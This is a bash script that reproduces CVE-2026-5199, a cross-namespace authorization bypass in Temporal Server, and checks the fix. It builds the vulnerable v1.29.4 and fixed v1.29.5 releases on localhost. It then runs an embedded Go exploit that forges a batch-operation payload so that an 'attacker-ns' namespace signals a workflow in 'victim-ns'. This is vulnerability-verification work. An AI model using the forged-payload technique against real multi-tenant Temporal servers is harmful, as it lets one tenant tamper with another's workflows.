#!/bin/bash
set -euo pipefail

ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
REPRO_DIR="$ROOT/repro"
mkdir -p "$LOGS"
mkdir -p "$REPRO_DIR"

REPO_DIR="$ROOT/external/temporal"
SERVER_BIN="$REPO_DIR/temporal-server"
REPRO_GO="$REPO_DIR/repro_main.go"

echo "[+] Temporal Server CVE-2026-5199 Real-Server Reproduction"
echo "[+] Root: $ROOT"

# Clone repo if not present
if [ ! -d "$REPO_DIR/.git" ]; then
    echo "[+] Cloning temporal repo..."
    mkdir -p "$ROOT/external"
    git clone --depth=100 https://github.com/temporalio/temporal.git "$REPO_DIR"
fi

cd "$REPO_DIR"

# Fetch tags if needed
if ! git rev-parse v1.29.4 >/dev/null 2>&1; then
    echo "[+] Fetching tags..."
    git fetch --depth=200 origin tag v1.29.4 tag v1.29.5
fi

# Write the standalone Go repro program
cat > "$REPRO_GO" << 'EOF'
package main

import (
	"context"
	"fmt"
	"os"
	"time"

	"github.com/pborman/uuid"
	batchpb "go.temporal.io/api/batch/v1"
	commonpb "go.temporal.io/api/common/v1"
	enumspb "go.temporal.io/api/enums/v1"
	taskqueuepb "go.temporal.io/api/taskqueue/v1"
	"go.temporal.io/api/workflowservice/v1"
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
	"google.golang.org/protobuf/types/known/durationpb"
	batchspb "go.temporal.io/server/api/batch/v1"
	"go.temporal.io/server/common/payloads"
	"go.temporal.io/server/common/primitives"
)

func main() {
	conn, err := grpc.Dial("127.0.0.1:7233", grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		fmt.Fprintf(os.Stderr, "grpc dial: %v\n", err)
		os.Exit(2)
	}
	defer conn.Close()

	client := workflowservice.NewWorkflowServiceClient(conn)
	ctx := context.Background()

	// Create namespaces
	for _, ns := range []string{"attacker-ns", "victim-ns"} {
		_, err := client.RegisterNamespace(ctx, &workflowservice.RegisterNamespaceRequest{
			Namespace:                        ns,
			WorkflowExecutionRetentionPeriod: durationpb.New(24 * time.Hour),
			VisibilityArchivalState:          enumspb.ARCHIVAL_STATE_DISABLED,
			HistoryArchivalState:             enumspb.ARCHIVAL_STATE_DISABLED,
		})
		if err != nil {
			fmt.Fprintf(os.Stderr, "RegisterNamespace %s: %v\n", ns, err)
		}
	}

	// Start a victim workflow
	victimWF, err := client.StartWorkflowExecution(ctx, &workflowservice.StartWorkflowExecutionRequest{
		Namespace:    "victim-ns",
		WorkflowId:   "victim-wf-1",
		WorkflowType: &commonpb.WorkflowType{Name: "VictimWorkflow"},
		TaskQueue:    &taskqueuepb.TaskQueue{Name: "victim-tq"},
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Start victim workflow: %v\n", err)
		os.Exit(2)
	}

	// Get attacker namespace ID
	descResp, err := client.DescribeNamespace(ctx, &workflowservice.DescribeNamespaceRequest{
		Namespace: "attacker-ns",
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Describe attacker-ns: %v\n", err)
		os.Exit(2)
	}
	attackerNSID := descResp.NamespaceInfo.Id

	// Construct forged batch payload: NamespaceId matches attacker-ns,
	// but Request.Namespace points to victim-ns.
	batchParams := &batchspb.BatchOperationInput{
		NamespaceId: attackerNSID,
		BatchType:   enumspb.BATCH_OPERATION_TYPE_SIGNAL,
		Request: &workflowservice.StartBatchOperationRequest{
			Namespace: "victim-ns",
			JobId:     uuid.New(),
			Reason:    "test-reason",
			Executions: []*commonpb.WorkflowExecution{
				{WorkflowId: "victim-wf-1", RunId: victimWF.RunId},
			},
			Operation: &workflowservice.StartBatchOperationRequest_SignalOperation{
				SignalOperation: &batchpb.BatchOperationSignal{
					Signal:   "test-signal",
					Identity: "test-identity",
				},
			},
		},
	}

	inputPayload, err := payloads.Encode(batchParams)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Encode payload: %v\n", err)
		os.Exit(2)
	}

	// Start the internal batcher workflow in attacker-ns with the forged payload.
	_, err = client.StartWorkflowExecution(ctx, &workflowservice.StartWorkflowExecutionRequest{
		Namespace:    "attacker-ns",
		WorkflowId:   "batch-test-1",
		WorkflowType: &commonpb.WorkflowType{Name: "temporal-sys-batch-workflow-protobuf"},
		TaskQueue:    &taskqueuepb.TaskQueue{Name: primitives.PerNSWorkerTaskQueue},
		Input:        inputPayload,
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Start batch workflow: %v\n", err)
		os.Exit(2)
	}

	// Wait for the batcher worker to process.
	time.Sleep(15 * time.Second)

	// Query victim workflow history for signal events.
	histResp, err := client.GetWorkflowExecutionHistory(ctx, &workflowservice.GetWorkflowExecutionHistoryRequest{
		Namespace: "victim-ns",
		Execution: &commonpb.WorkflowExecution{
			WorkflowId: "victim-wf-1",
			RunId:        victimWF.RunId,
		},
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Get history: %v\n", err)
		os.Exit(2)
	}

	var signalCount int
	for _, ev := range histResp.History.Events {
		if ev.EventType == enumspb.EVENT_TYPE_WORKFLOW_EXECUTION_SIGNALED {
			signalCount++
		}
	}

	if signalCount > 0 {
		fmt.Printf("VULNERABLE: victim workflow received %d signal(s)\n", signalCount)
		os.Exit(0)
	} else {
		fmt.Printf("FIXED: victim workflow received 0 signals\n")
		os.Exit(1)
	}
}
EOF

# Portable function to check if a TCP port is listening
port_listening() {
	local host="${1:-127.0.0.1}"
	local port="${2:-7233}"
	if (echo > /dev/tcp/$host/$port) >/dev/null 2>&1; then
		return 0
	fi
	return 1
}

wait_for_server() {
	local LOGFILE=$1
	local max_wait=${2:-60}
	echo "[+] Waiting for server port 7233 (up to ${max_wait}s)..."
	local waited=0
	while [ "$waited" -lt "$max_wait" ]; do
		if port_listening 127.0.0.1 7233; then
			echo "[+] Server port 7233 is listening after ${waited}s"
			return 0
		fi
		sleep 1
		waited=$((waited + 1))
	done
	echo "[-] Server port 7233 did not become listening within ${max_wait}s"
	echo "[-] Last server log lines:"
	tail -20 "$LOGFILE" >&2 || true
	return 1
}

run_version() {
	local VERSION=$1
	local LOGFILE=$2
	shift 2

	echo "[+] Building server $VERSION..."
	git checkout "$VERSION"
	go build -o "$SERVER_BIN" ./cmd/server

	# Clean up any stale server processes
	echo "[+] Cleaning up old server processes..."
	pkill -9 -f "temporal-server" 2>/dev/null || true
	for i in $(seq 1 10); do
		if pgrep -f "temporal-server" >/dev/null 2>&1; then
			sleep 1
		else
			break
		fi
	done

	# Start server in background with SQLite in-memory
	echo "[+] Starting server..."
	nohup "$SERVER_BIN" --allow-no-auth --env development-sqlite start > "$LOGS/server_${VERSION}.log" 2>&1 &
	local SERVER_PID=$!
	echo "$SERVER_PID" > "$LOGS/server_${VERSION}.pid"

	# Wait for server to be ready
	if ! wait_for_server "$LOGS/server_${VERSION}.log" 60; then
		kill -9 "$SERVER_PID" 2>/dev/null || true
		return 2
	fi

	echo "[+] Running reproduction..."
	go run "$REPRO_GO" > "$LOGFILE" 2>&1
	local RESULT=$?

	kill -9 "$SERVER_PID" 2>/dev/null || true
	return $RESULT
}

# --- VULNERABLE VERSION ---
echo "[+] Testing vulnerable version v1.29.4..."
VULN_LOG="$LOGS/vuln_repro.log"
set +e
run_version v1.29.4 "$VULN_LOG"
VULN_RESULT=$?
set -e
if [ "$VULN_RESULT" -eq 0 ]; then
    echo "[+] VULNERABLE test PASSED — victim workflow received signal, bypass confirmed on v1.29.4"
    VULN_CONFIRMED=1
elif [ "$VULN_RESULT" -eq 1 ]; then
    echo "[-] VULNERABLE test FAILED — victim workflow received 0 signals on v1.29.4"
    VULN_CONFIRMED=0
else
    echo "[-] VULNERABLE test INFRASTRUCTURE FAILURE (exit $VULN_RESULT)"
    VULN_CONFIRMED=0
fi

# --- FIXED VERSION ---
echo "[+] Testing fixed version v1.29.5..."
FIX_LOG="$LOGS/fix_repro.log"
set +e
run_version v1.29.5 "$FIX_LOG"
FIX_RESULT=$?
set -e
if [ "$FIX_RESULT" -eq 1 ]; then
    echo "[+] FIXED test FAILED as expected — fix correctly blocked the bypass on v1.29.5"
    FIX_CONFIRMED=1
elif [ "$FIX_RESULT" -eq 0 ]; then
    echo "[-] FIXED test PASSED — fix may not be effective (victim still received signal)"
    FIX_CONFIRMED=0
else
    echo "[-] FIXED test INFRASTRUCTURE FAILURE (exit $FIX_RESULT)"
    FIX_CONFIRMED=0
fi

# Summary
echo ""
echo "===== SUMMARY ====="
echo "Vulnerable v1.29.4: $([ "$VULN_CONFIRMED" = "1" ] && echo 'CONFIRMED' || echo 'NOT CONFIRMED')"
echo "Fixed v1.29.5:     $([ "$FIX_CONFIRMED" = "1" ] && echo 'FIX VERIFIED' || echo 'FIX NOT VERIFIED')"
echo "Logs written to:   $LOGS"
echo "==================="

# Write runtime manifest
cat > "$REPRO_DIR/runtime_manifest.json" << EOF
{
  "cve": "CVE-2026-5199",
  "description": "Temporal Server batcher worker cross-namespace authorization bypass",
  "reproduction_method": "Real Temporal server (SQLite in-memory) with forged BatchOperationInput injected via StartWorkflowExecution to temporal-sys-batch-workflow-protobuf",
  "vulnerable_version": "v1.29.4",
  "fixed_version": "v1.29.5",
  "vulnerable_test_result": "$([ "$VULN_CONFIRMED" = "1" ] && echo 'pass' || echo 'fail')",
  "fixed_test_result": "$([ "$FIX_CONFIRMED" = "1" ] && echo 'fail' || echo 'pass')",
  "vulnerability_confirmed": $([ "$VULN_CONFIRMED" = "1" ] && echo 'true' || echo 'false'),
  "fix_verified": $([ "$FIX_CONFIRMED" = "1" ] && echo 'true' || echo 'false'),
  "logs": {
    "vulnerable_repro": "$VULN_LOG",
    "fixed_repro": "$FIX_LOG"
  }
}
EOF

if [ "$VULN_CONFIRMED" = "1" ] && [ "$FIX_CONFIRMED" = "1" ]; then
    echo "[+] Reproduction successful: vulnerability confirmed and fix verified."
    exit 0
else
    echo "[-] Reproduction incomplete."
    exit 1
fi
